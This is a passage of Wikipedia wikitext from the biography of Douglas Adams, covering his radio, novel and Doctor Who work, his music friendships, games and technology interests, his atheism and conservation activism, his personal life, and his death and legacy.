Tertiary Phase|The Tertiary Phase]]'', was broadcast on [[BBC Radio 4]] in September 2004 and was subsequently released on audio CD. With the aid of a recording of his reading of ''Life, the Universe and Everything'' and editing, Adams can be heard playing the part of Agrajag posthumously. ''So Long, and Thanks for All the Fish'' and ''Mostly Harmless'' made up the fourth and fifth radio series, respectively (on radio they were titled ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quandary Phase|The Quandary Phase]]'' and ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quintessential Phase|The Quintessential Phase]]'') and these were broadcast in May and June 2005, and also subsequently released on Audio CD. The last episode in the last series (with a new, \"more upbeat\" ending) concluded with, \"The very final episode of ''The Hitchhiker's Guide to the Galaxy'' by Douglas Adams is affectionately dedicated to its author.\"<ref>Adams, ''Dirk Maggs'', Page 356.</ref>\n\n====''Dirk Gently'' series====\n[[File:Douglas Adams San Francisco.jpg|thumb|Adams in March 2000]]\nIn between Adams's first trip to Madagascar with [[Mark Carwardine]] in 1985, and their series of travels that formed the basis for the radio series and non-fiction book ''[[Last Chance to See]]'', Adams wrote two other novels with a new cast of characters. ''[[Dirk Gently's Holistic Detective Agency]]'' was first published in 1987, and was described by its author as \"a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics\".<ref>{{cite book|author=[[Neil Gaiman|Gaiman, Neil]] | title=Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy | edition=Second U.S. | publisher=Titan Books | year=2003 | page=169 | isbn=1-84023-742-2}}</ref> It was derived from two Doctor Who serials Adams had written.\n\nA sequel novel, ''[[The Long Dark Tea-Time of the Soul]]'', was published a year later. This was an entirely original work, Adams's first since ''So Long, and Thanks for All the Fish.'' After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for ''Last Chance to See''.\n\n====''Doctor Who''====\n{{Main article|Doctor Who}}\nAdams sent the script for the ''HHGG'' pilot radio programme to the ''Doctor Who'' production office in 1978, and was commissioned to write ''[[The Pirate Planet]]'' (see below). He had also previously attempted to submit a potential movie script, called \"Doctor Who and the Krikkitmen\", which later became his novel ''Life, the Universe and Everything'' (which in turn became the third ''Hitchhiker's Guide'' radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. Altogether, he wrote three [[List of Doctor Who serials|''Doctor Who'' serials]] starring [[Tom Baker]] as [[The Doctor (Doctor Who)|the Doctor]]:\n* \"[[The Pirate Planet]]\" (the second serial in the \"[[The Key to Time|Key to Time]]\" arc, in [[Doctor Who (season 16)|season 16]])\n* \"[[City of Death]]\" (with producer [[Graham Williams (television producer)|Graham Williams]], from an original storyline by writer [[David Fisher (writer)|David Fisher]]. It was transmitted under the pseudonym \"[[David Agnew]]\")\n* \"[[Shada]]\" (only partially filmed; not televised due to [[strike action|industry disputes]])\n\nThe episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<ref>{{cite web|url=http://www.skepticfiles.org/en001/drwhogde.htm |title=A 1990s Doctor Who FAQ |publisher=Skepticfiles.org |accessdate=11 March 2013}}</ref> \"Shada\" was later adapted as a novel by [[Gareth Roberts (writer)|Gareth Roberts]] in 2012 and \"City of Death\" by [[James Goss (producer)|James Goss]] in 2015.\n\nAdams was also known to allow in-jokes from ''The Hitchhiker's Guide'' to appear in the ''Doctor Who'' stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted ''Hitchhiker's'' references, even [[The Rings of Akhaten|as recently as 2013]]. Conversely, at least one reference to ''Doctor Who'' was worked into a ''Hitchhiker's'' novel. In ''[[Life, the Universe and Everything]]'', two characters travel in time and land on the pitch at [[Lord's Cricket Ground]]. The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66-story ''[[The Daleks' Master Plan]]'', which has the Doctor's [[TARDIS]] [[Materialization (science fiction)|materialise]] on the pitch at Lord's.\n\nElements of ''Shada'' and ''City of Death'' were reused in Adams's later novel ''[[Dirk Gently's Holistic Detective Agency]]'', in particular the character of [[Professor Chronotis]]. [[Big Finish Productions]] eventually remade ''Shada'' as an audio play starring [[Paul McGann]] as the Doctor. Accompanied by partially animated illustrations, it was [[Doctor Who spin-offs#Webcasts|webcast]] on the [[BBC Online|BBC website]] in 2003, and subsequently released as a two-CD set later that year. An omnibus edition of this version was broadcast on the digital radio station [[BBC7]] on 10 December 2005.\n\nIn the ''Doctor Who'' 2012 Christmas episode ''[[The Snowmen#Production|The Snowmen]]'', writer [[Steven Moffat]] was inspired by a storyline that Adams pitched called ''The Doctor Retires''.<ref>{{cite web|last=Moffat |first=Steven |url=http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all |title=Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all |work=Radio Times |date=24 December 2012 |accessdate=8 July 2013}}</ref>\n\nWhile he was at school,{{which|date=October 2015}} he wrote and performed a play called ''Doctor Which''.<ref name=Adams_xx>{{Harvnb|Adams|2002|pp=xx}}</ref>\n\n===Music===\nAdams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having received his first guitar in 1964). He also studied piano in the 1960s with the same teacher as [[Paul Wickens]], the pianist who plays in [[Paul McCartney]]'s band (and composed the music for the 2004–2005 editions of the ''Hitchhiker's Guide'' radio series).<ref>Webb, page 49.</ref> [[Pink Floyd]] and [[Procol Harum]] had important influence on Adams's work.\n\n====Pink Floyd====\n\nAdams included a reference to [[Pink Floyd]] in the original radio version of ''[[The Hitchhiker's Guide to the Galaxy]]'', in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's \"[[Shine on You Crazy Diamond]]\" (Part 1). This was cut out of the CD version. Adams also compared the various noises that the [[kakapo]] makes to \"Pink Floyd studio out-takes\" in his non-fiction book on endangered species, ''[[Last Chance to See]]''.\n\nAdams's official biography shares its name with the song \"[[Wish You Were Here (1975 song)|Wish You Were Here]]\" by Pink Floyd. Adams was friends with Pink Floyd guitarist [[David Gilmour]] and, on Adams's 42nd birthday, he was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs \"[[Brain Damage (song)|Brain Damage]]\" and \"[[Eclipse (song)|Eclipse]]\".<ref name=Mabbett-MM>{{Cite book |publisher= Omnibus Press |isbn= 978-1-84938-370-7 |last= Mabbett |first= Andy |title= Pink Floyd – The Music and the Mystery |location= London |year= 2010 }}</ref> Adams chose the name for Pink Floyd's 1994 album, ''[[The Division Bell]]'', by picking the words from the lyrics to one of its tracks, \"High Hopes\".<ref name=Mabbett-MM /> Gilmour also performed at Adams's memorial service in 2001, and what would have been Adams's 60th birthday party in 2012.\n\n====Procol Harum====\nAdams was a friend of [[Gary Brooker]], the lead singer, pianist and songwriter of [[Procol Harum]]. Adams invited Brooker to one of the many parties that Adams held at his house. On one such occasion Gary Brooker performed the full (4 verse) version of \"[[A Whiter Shade of Pale]]\". Brooker also performed at Adams's memorial service.\n\nAdams appeared on stage with Brooker to perform \"In Held 'Twas in I\" at Redhill when the band's lyricist [[Keith Reid]] was not available. On several other occasions he introduced Procol Harum at their gigs.\n\nAdams would listen to music while writing, and this would occasionally influence his work. On one occasion the title track from the Procol Harum album ''[[Grand Hotel (album)|Grand Hotel]]'' was playing when\n{{quotation|Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background? And I eventually thought ... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.|Douglas Adams|Procol Harum at The Barbican<ref>{{cite web|url=http://www.procolharum.com/dadams.htm |title=Text of one of Douglas Adams's introductions of Procol Harum in concert |accessdate=21 August 2006|last=Adams |first=Douglas |date=8 February 1996}}</ref>}}\n\n===Computer games and projects===\nDouglas Adams created an [[interactive fiction]] version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|HHGG]]'' with [[Steve Meretzky]] from [[Infocom]] in 1984. In 1986 he participated in a week-long brainstorming session with the [[Lucasfilm Games]] team for the game ''[[Labyrinth: The Computer Game|Labyrinth]]''. Later he was also involved in creating ''[[Bureaucracy (computer game)|Bureaucracy]]'' (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).\n\nAdams was a founder-director and Chief Fantasist of [[The Digital Village]], a digital media and Internet company with which he created ''[[Starship Titanic]]'', a [[Codie]] Award-winning and [[BAFTA#Games Awards|BAFTA-nominated adventure game]], which was published in 1998 by [[Simon & Schuster]].<ref name=\"bbc.co.uk\">BBC Online (no date) [http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml \"The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)\"] Accessed 9 July 2014</ref><ref>Botti, Nicolas (2009). [http://www.douglasadams.eu/en_adams_bio.php \"Life, DNA & h2g2: Douglas Adams's Biography\"] Accessed 9 July 2014</ref> [[Terry Jones]] wrote the accompanying book, entitled ''Douglas Adams Starship Titanic'', since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the [[h2g2]] [[collaborative writing]] project, an experimental attempt at making ''The Hitchhiker's Guide to the Galaxy'' a reality, and at harnessing the collective brainpower of the internet community. It found a new home at BBC Online in 2001.<ref name=\"bbc.co.uk\"/>\n\nIn 1990 Adams wrote and presented a television documentary programme ''[[Hyperland]]''<ref>[http://www.imdb.com/title/tt0188677/ Internet Movie Database's page for ''Hyperland'']</ref> which featured [[Tom Baker]] as a \"software agent\" (similar to the assistant pictured in Apple's [[Knowledge Navigator]] video of future concepts from 1987), and interviews with [[Ted Nelson]], the co-inventor of [[hypertext]] and the person who coined the term. Although Adams did not invent hypertext, he was an [[early adopter]] and advocate of it. This was the same year that [[Tim Berners-Lee]] used the idea of hypertext in his [[HTML]].\n\n==Personal beliefs and activism==\n\n===Atheism and views on religion===\nAdams described himself as a \"radical [[atheist]]\", adding ''radical'' for emphasis so he would not be asked if he meant agnostic. He told [[American Atheists]] that this made things easier, but most importantly it conveyed the fact that he really meant it. \"I am convinced that there is not a god,\" he said. He imagined a [[Fine-tuned Universe#In popular culture|sentient puddle]] who wakes up one morning and thinks, \"This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? In fact it fits me staggeringly well, must have been made to have me in it!\" to demonstrate his view that the [[fine-tuned Universe]] argument for God was a fallacy.<ref>Adams 1998.</ref>\n\nDespite this, he remained fascinated by religion because of its effect on human affairs. \"I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing.\"<ref name=amath>{{cite journal|last=Silverman |first=Dave |title=Interview: Douglas Adams |journal=American Atheist |year=1998–1999 |volume=37 |issue=1 |url=http://www.atheists.org/Interview%3A__Douglas_Adams |accessdate=16 August 2009 |archiveurl=http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams |archivedate=8 December 2011 |deadurl=no |df=dmy }}</ref>\n\nThe evolutionary biologist and atheist [[Richard Dawkins]] uses Adams's influence throughout to exemplify arguments for non-belief in his 2006 book ''[[The God Delusion]]''. Dawkins dedicated the book to Adams, whom he jokingly called \"possibly [my] only convert\" to atheism<ref name=\"TheGuardian\">{{cite news|url=http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html |title=Observer, ''The God Delusion'', 5 November 2006|newspaper=[[The Guardian]]|date=5 November 2006 |accessdate=1 June 2009 | location=London | first=Kim | last=Bunce}}</ref> and wrote on his death that \"Science has lost a friend, literature has lost a luminary, the [[mountain gorilla]] and the [[black rhino]] have lost a gallant defender.\"<ref name=Dawkins2001>{{cite news|last=Dawkins|first=Richard|title=Lament for Douglas Adams|url=http://www.guardian.co.uk/uk/2001/may/14/books.booksnews|accessdate=29 December 2012|newspaper=The Guardian|date=13 May 2001}}</ref>\n\n===Environmental activism===\nAdams was also an [[environmental activist]] who campaigned on behalf of [[endangered species]]. This activism included the production of the non-fiction radio series ''[[Last Chance to See]]'', in which he and [[natural history|naturalist]] [[Mark Carwardine]] visited rare species such as the [[kakapo]] and [[Chinese river dolphin|baiji]], and the publication of a tie-in book of the same name. In 1992 this was made into a CD-ROM combination of [[audiobook]], [[e-book]] and picture slide show.\n\nAdams and Mark Carwardine contributed the 'Meeting a Gorilla' passage from ''[[Last Chance to See]]'' to the book ''[[Great Ape Project|The Great Ape Project]]''.<ref>{{cite book | author=[[Paola Cavalieri|Cavalieri, Paola]] and [[Peter Singer]], editors | title=The Great Ape Project: Equality Beyond Humanity | edition=U.S. Paperback | publisher=St. Martin's Griffin | year=1994 | pages=19–23|isbn=0-312-11818-X}}</ref> This book, edited by [[Paola Cavalieri]] and [[Peter Singer]], launched a wider-scale project in 1993, which calls for the extension of moral equality to include all great apes, human and non-human.\n\nIn 1994 he participated in a climb of [[Mount Kilimanjaro]] while wearing a rhino suit for the British charity organisation ''[[Save the Rhino|Save the Rhino International]]''. Puppeteer [[William Todd-Jones]], who had originally worn the suit in the London Marathon to raise money and bring awareness to the group, also participated in the climb wearing a rhino suit; Adams wore the suit while travelling to the mountain before the climb began. About £100,000 was raised through that event, benefiting schools in [[Kenya]] and a [[black rhinoceros]] preservation programme in [[Tanzania]]. Adams was also an active supporter of the ''[[Dian Fossey]] Gorilla Fund''.\n\nSince 2003, ''Save the Rhino'' has held an annual Douglas Adams Memorial Lecture around the time of his birthday to raise money for environmental campaigns.<ref>{{cite web|url=http://lifednah2g2.blogspot.co.uk/2011/01/ninth-douglas-adams-memorial-lecture.html |title=The Ninth Douglas Adams Memorial Lecture |publisher=Save the Rhino International |accessdate=27 July 2011}}</ref> The lectures in the series are:\n* 2003 [[Richard Dawkins]] – ''Queerer than we can suppose: the strangeness of science''\n* 2004 [[Robert Swan]] – ''Mission Antarctica''\n* 2005 [[Mark Carwardine]] – ''Last Chance to See... Just a bit more''\n* 2006 [[Robert Winston]] – ''Is the Human an Endangered Species?''\n* 2007 [[Richard Leakey]] – ''Wildlife Management in East Africa – Is there a future?''\n* 2008 [[Steven Pinker]] – ''The Stuff of Thought, Language as a Window into Human Nature''\n* 2009 [[Benedict Allen]] – ''Unbreakable''\n* 2010 [[Marcus du Sautoy]] – ''42: the answer to life, the universe and prime numbers''\n* 2011 [[Brian Cox (physicist)|Brian Cox]] – ''The Universe and Why We Should Explore It''\n* 2012 Lecture replaced by \"Douglas Adams The Party\"<ref>{{cite web|url=http://www.savetherhino.org/latest_news/news/287_douglas_adams_the_party |title=Douglas Adams The Party |publisher=Save the Rhino International |accessdate=11 March 2013}}</ref>\n* 2013 [[Adam Rutherford]] – ''Creation: the origin and the future of life''<ref>{{cite web|url=http://www.savetherhino.org/events/476_douglas_adams_memorial_lecture_2013 |title=Douglas Adams Memorial Lecture 2013 |publisher=Save the Rhino International |accessdate=15 August 2012}}</ref>\n* 2014 [[Roger Highfield]] and [[Simon Singh]] – ''The Science of Harry Potter and the Mathematics of The Simpsons''<ref>{{cite web|url=http://www.savetherhino.org/events/798_douglas_adams_memorial_lecture |title=Douglas Adams Memorial Lecture 2014 |publisher=Save the Rhino International |accessdate=15 November 2013}}</ref>\n* 2015 [[Neil Gaiman]] – ''Immortality and Douglas Adams''<ref>{{cite web|url=http://www.savetherhino.org/events/1059_douglas_adams_memorial_lecture_2015_-_sold_out |title=Douglas Adams Memorial Lecture 2015 |publisher=Save the Rhino International |accessdate=30 January 2015}}</ref>\n* 2016 [[Alice Roberts]] – ''Survivors of the Ice Age''<ref>{{ cite web|url=https://www.savetherhino.org/events/1383_douglas_adams_memorial_lecture_2016|title=Douglas Adams Memorial Lecture 2016 |publisher=Save the Rhino International |accessdate=7 December 2015}}</ref>\n\n===Technology and innovation===\nAdams bought his first [[word processor]] in 1982, having considered one as early as 1979. His first purchase was a 'Nexus'. In 1983, when he and Jane Belson went out to Los Angeles, he bought a [[Digital Equipment Corporation|DEC]] [[Rainbow 100|Rainbow]]. Upon their return to England, Adams bought an [[Apricot Computers|Apricot]], then a [[BBC Micro]] and a [[Tandy 1000]].<ref name=Simpson_184-185>{{Harvnb|Simpson|2003|pp=184–185}}</ref> In ''[[Last Chance to See]]'' Adams mentions his [[Cambridge Z88]], which he had taken to [[Zaire]] on a quest to find the [[northern white rhinoceros]].<ref>{{cite book|author=Adams, Douglas and [[Mark Carwardine]] | title=Last Chance to See | edition=First U.S. Hardcover | publisher=[[Harmony Books]] | year=1991 | page=59 | isbn=0-517-58215-5}}</ref>\n\nAdams's posthumously published work, ''[[The Salmon of Doubt]]'', features multiple articles by him on the subject of technology, including reprints of articles that originally ran in ''[[MacUser]]'' magazine, and in ''[[The Independent on Sunday]]'' newspaper. In these Adams claims that one of the first computers he ever saw was a [[Commodore PET]], and that he has \"adored\" his Apple Macintosh (\"or rather my family of however many Macintoshes it is that I've recklessly accumulated over the years\") since he first saw one at Infocom's offices in Boston in 1984.<ref>{{cite book | author=Adams, Douglas | title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time | edition=First UK hardcover | publisher=Macmillan | year=2002 | pages=90–1 | isbn=0-333-76657-1}}</ref>\n\nAdams was a Macintosh user from the time they first came out in 1984 until his death in 2001. He was the first person to buy a Mac in Europe (the second being [[Stephen Fry]] – though some accounts differ on this, saying Fry bought his Mac first. Fry claims he was second to Adams<ref>{{cite web|url=https://www.youtube.com/watch?v=gx6WPQkhUXI |title=Craig Ferguson 23 February, 2010B Late Late show Stephen Fry PT2 |publisher=YouTube |date=21 June 2010 |accessdate=27 July 2011}}</ref>). Adams was also an \"[[AppleMasters|Apple Master]]\", one of several celebrities whom Apple made into spokespeople for its products (other Apple Masters included [[John Cleese]] and [[Gregory Hines]]). Adams's contributions included a rock video that he created using the first version of [[iMovie]] with footage featuring his daughter Polly. The video was available on Adams's [[.Mac]] homepage. Adams installed and started using the first release of [[Mac OS X]] in the weeks leading up to his death. His very last post to his own forum was in praise of Mac OS X and the possibilities of its [[Cocoa (API)|Cocoa]] programming framework. He said it was \"awesome...\", which was also the last word he wrote on his site.<ref>{{cite web|url=http://www.douglasadams.com/cgi-bin/mboard/info/dnathread.cgi?2922,1 |title=Adams's final post on his forums at |publisher=Douglasadams.com |accessdate=1 June 2009}}</ref>\n\nAdams used e-mail extensively long before it reached popular awareness, using it to correspond with [[Steve Meretzky]] during the pair's collaboration on Infocom's version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]''.<ref name=\"Simpson_184-185\"/> While living in New Mexico in 1993 he set up another e-mail address and began posting to his own [[USENET]] newsgroup, alt.fan.douglas-adams, and occasionally, when his computer was acting up, to the comp.sys.mac hierarchy.<ref>{{cite web|url=https://groups.google.com/group/alt.fan.douglas-adams |title=Discussions – alt.fan.douglas-adams | Google Groups |publisher=Google |accessdate=11 March 2013}}</ref> Many of his posts are now archived through Google. Challenges to the authenticity of his messages later led Adams to set up a message forum on his own website to avoid the issue. In 1996, Adams was a keynote speaker at The [[Microsoft]] [[Professional Developers Conference]] (PDC) where he described the personal computer as being a modelling device. The video of his keynote speech is archived on [[Channel 9 (discussion forum)|Channel 9]].<ref>{{cite web |last = Adams |first = Douglas |title = PDC 1996 Keynote with Douglas Adams |work=[[channel9.msdn.com]] |publisher=Channel 9 |date = 15 May 2001 |url = http://channel9.msdn.com/Events/PDC/PDC-1996/PDC-1996-Keynote-with-Douglas-Adams |accessdate =22 March 2013}}</ref>\nAdams was also a keynote speaker for the April 2001 [[Embedded Systems Conference#ESC Silicon Valley|Embedded Systems Conference]] in San Francisco, one of the major technical conferences on [[embedded system]] engineering. In his keynote speech, he shared his vision of technology and how it should contribute in everyday – and every man's – life.<ref>{{cite web |last = Cassel |first = David |title = So long, Douglas Adams, and thanks for all the fun |work=[[Salon (website)|Salon]] |publisher=Salon Media Group |date = 15 May 2001 |url = http://archive.salon.com/tech/feature/2001/05/15/douglas_adams/index.html |accessdate =10 July 2009}}</ref>\n\n==Personal life==\nAdams moved to [[Upper Street]], [[Islington]], in 1981<ref name=\"IPP\" /> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<ref name=\"IPP\" />\n\nIn the early 1980s Adams had an affair with novelist [[Sally Emerson]], who was separated from her husband at that time. Adams later dedicated his book ''[[Life, the Universe and Everything]]'' to Emerson. In 1981 Emerson returned to her husband, [[Peter Stothard]], a contemporary of Adams's at [[Brentwood School (England)|Brentwood School]], and later editor of ''[[The Times]]''. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. Belson was the \"lady barrister\" mentioned in the jacket-flap biography printed in his books during the mid-1980s (\"He [Adams] lives in Islington with a lady barrister and an Apple Macintosh\"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of ''Hitchhiker's''. When the deal fell through, they moved back to London, and after several separations (\"He is currently not certain where he lives, or with whom\")<ref name=sfweekly>{{cite web|last=Bowers |first=Keith |title=Big Three |url=http://www.sfweekly.com/2011-07-06/calendar/big-three/ |work=SF Weekly |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mSWp8yr?url=http%3A%2F%2Fwww.sfweekly.com%2F2011-07-06%2Fcalendar%2Fbig-three%2F |archivedate=8 December 2011 |deadurl=no |date=6 July 2011 |df=dmy }}</ref> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to [[Santa Barbara, California]], where they lived until his death. Following the funeral, Jane Belson and Polly Adams returned to London.<ref>Webb, Chapter 10.</ref> Jane died on 7 September 2011 of cancer, aged 59.<ref name=timesobit>{{cite web|title=Obituary & Guest Book Preview for Jane Elizabeth BELSON|url=http://announcements.thetimes.co.uk/obituaries/timesonline-uk/obituary.aspx?page=lifestory&pid=153521790|work=The Times|accessdate=8 December 2011|archiveurl=http://www.webcitation.org/63mSoMnJe|archivedate=8 December 2011|deadurl=no|date=9 September 2011}}</ref><ref name=h2g2obit>{{cite web|title=Jane Belson, Douglas Adams's widow, passed away|url=http://lifednah2g2.blogspot.com/2011/09/jane-belson-douglas-adams-widow-passed.html|work=h2g2|accessdate=9 July 2013}}</ref>\n\n==Death and legacy==\n[[File:Highgate Cemetery - East - Douglas Adams 01.jpg|thumb|Adams's gravestone, [[Highgate Cemetery]], North London]]\nAdams died of a [[heart attack]] on 11 May 2001, aged 49, after resting from his regular workout at a private gym in [[Montecito, California]]. He had unknowingly suffered a gradual narrowing of the [[coronary arteries]], which led at that moment to a [[myocardial infarction]] and a fatal [[cardiac arrhythmia]].{{cn|date=October 2016}} Adams had been due to deliver the commencement address at [[Harvey Mudd College]] on 13 May.<ref>{{cite web|url=http://www.laweekly.com/2001-05-24/news/lots-of-screamingly-funny-sentences-no-fish/ |title=Lots of Screamingly Funny Sentences. No Fish. – page 1 |last1=Lewis |first1=Judith |last2=Shulman |first2=Dave |publisher=LA Weekly |date=24 May 2001 |accessdate=20 August 2009 |archiveurl=http://www.webcitation.org/63mQ1aCJQ?url=http%3A%2F%2Fwww.laweekly.com%2F2001-05-24%2Fnews%2Flots-of-screamingly-funny-sentences-no-fish%2F |archivedate=24 May 2001 |deadurl=no |df=dmy }}</ref> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in [[Highgate Cemetery]] in north London in June 2002.<ref name=Simpson_337-338>{{Harvnb|Simpson|2003|pp=337–338}}</ref>\n\nA memorial service was held on 17 September 2001 at [[St Martin-in-the-Fields]] church, [[Trafalgar Square]], London. This became the first church service broadcast live on the web by the BBC.<ref>Gaiman, 204.</ref> Video clips of the service are still available on the BBC's website for download.<ref>{{cite web|url=http://www.bbc.co.uk/cult/hitchhikers/celebration/ |title=BBC Online – Cult – Hitchhiker's – Douglas Adams – Service of Celebration |publisher=BBC |date=17 September 2001 |accessdate=11 March 2013}}</ref>\n\nOne of his last public appearances was a talk given at the University of California, Santa Barbara, ''Parrots, the universe and everything'', recorded days before his death.<ref>{{cite web|url=https://www.youtube.com/watch?v=_ZG8HBuDjgc |title=Parrots, the universe and everything, recorded May 2001 |publisher=YouTube |accessdate=11 March 2013}}</ref> A full transcript of the talk is available, and the university has made the full video available on [https://www.youtube.com/watch?v=_ZG8HBuDjgc YouTube].<ref>{{cite web|url=http://navarroj.com/parrots |title=Transcript of \"Parrots, the Universe and Everything\" |publisher=Navarroj.com |accessdate=27 July 2011}}</ref>\n\nThe [[Minor Planet Centre]] space agency named an asteroid [[18610 Arthurdent]], coincidentally announcing its plan two days before Adams died.<ref name=MPC42677>{{Citation | publication-date = 9 May 2001 | title = New Names of Minor Planets | periodical = [[Minor Planet Circular]] | publication-place = Cambridge, Mass | publisher=[[Minor Planet Center]] | issue = MPC 42677 | url = http://www.minorplanetcenter.net/iau/ECS/MPCArchive/2001/MPC_20010509.pdf | issn = 0736-6884 }}</ref> There is also an [[25924 Douglasadams|asteroid named after Adams himself]].<ref>[http://www.msnbc.msn.com/id/6867061/ Asteroid named after 'Hitchhiker' humorist: Late British sci-fi author honored after cosmic campaign] by Alan Boyle, MSNBC, 25 January 2005</ref>\n\nIn May 2002 ''[[The Salmon of Doubt]]'' was published, containing many short stories, essays, and letters, as well as eulogies from [[Richard Dawkins]], [[Stephen Fry]] (in the UK edition), [[Christopher Cerf]] (in the US edition), and [[Terry Jones]] (in the US paperback edition). It also includes eleven chapters of his long-awaited but unfinished novel, ''The Salmon of Doubt'', which was originally intended to become a new [[Dirk Gently]] novel, but might have later become the sixth ''Hitchhiker'' novel.<ref>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\n|title=The Salmon of Doubt by Douglas Adams\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|last=Murray\n|first=Charles Shaar\n| date=10 May 2002\n}}\n</ref><ref>\n{{cite news\n|url=http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\n|title=Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\n|work=The Independent |location=London\n|accessdate=2 August 2009\n|author=The Literator\n| date=5 January 2002|archiveurl=https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html|archivedate=1 August 2009 }}\n</ref>\n\nOther events after Adams's death included a [[webcast]] production of ''[[Shada]]'', allowing the complete story to be told, radio dramatisations of the final three books in the ''Hitchhiker's'' series, and the completion of [[The Hitchhiker's Guide to the Galaxy (film)|the film adaptation]] of ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]''. The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.\n\nA 12-part radio series based on the [[Dirk Gently]] novels was announced in 2007, with annual transmissions starting in October.<ref>{{cite web |url=http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm |title=Dirk Maggs News and New Projects page }}{{dead link|date=June 2016|bot=medic}}{{cbignore|bot=medic}}</ref>\n\nBBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of ''The Salmon of Doubt'', and written by [[Kim Fuller]];<ref>{{cite web|author=Matthew Hemley |url=http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be |title=The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4 |work=The Stage |date=5 May 2009 |accessdate=20 August 2009}}</ref> but this was dropped in favour of a BBC TV series based on the two completed novels.<ref>{{cite web|url=http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series|title=BBC plans Dirk Gently TV series|publisher=Chortle.co.uk|date=11 October 2009|accessdate=11 October 2009}}</ref> A sixth ''Hitchhiker'' novel, ''[[And Another Thing... (novel)|And Another Thing...]]'', by ''[[Artemis Fowl (series)|Artemis Fowl]]'' author [[Eoin Colfer]], was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. A [[BBC Radio 4]] ''[[Book at Bedtime]]'' adaptation and an audio book soon followed.\n\nOn 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as [[Towel Day]], which has been observed every year since then.\n\nIn 2011, over 3,000 people took part in a public vote to choose the subjects of [[Blue plaque|People's Plaques]] in Islington;<ref name=\"IPP\">{{cite web|url=http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |title=Islington People's Plaques |date=25 July 2011 |accessdate=13 August 2011 |deadurl=yes |archiveurl=https://web.archive.org/web/20120318001614/http://www.islington.gov.uk/Leisure/heritage/heritage_borough/bor_plaques/peoplesplaques.asp |archivedate=18 March 2012 }}</ref> Adams received 489 votes.\n\nOn 11 March 2013, Adams's 61st birthday was celebrated with an interactive [[Google Doodle]].<ref name=GoogleDoodle2013a>{{cite news|title=Don't Panic! Google Doodle Honors Author Douglas Adams|url=http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/|accessdate=11 March 2013|newspaper=abc News|date=11 March 2013}}</ref><ref>{{cite web|title=Douglas Adams' 61st Birthday|url=http://www.google.com/doodles/douglas-adams-61st-birthday|accessdate=11 March 2013}}</ref>\n\n==Awards and nominations==\n{| class=\"wikitable\" style=\"font-size:90%\"\n|- style=\"text-align:center;\"\n! style=\"background:#B0C4DE;\" | Year\n! style=\"background:#B0C4DE;\" | Award\n! style=\"background:#B0C4DE;\" | Work\n! style=\"background:#B0C4DE;\" | Category\n! style=\"background:#B0C4DE;\" | Result\n! style=\"background:#B0C4DE;\" | Reference\n|-\n|1979\n|[[Hugo Award]]\n|''[[The Hitchhiker's Guide to the Galaxy 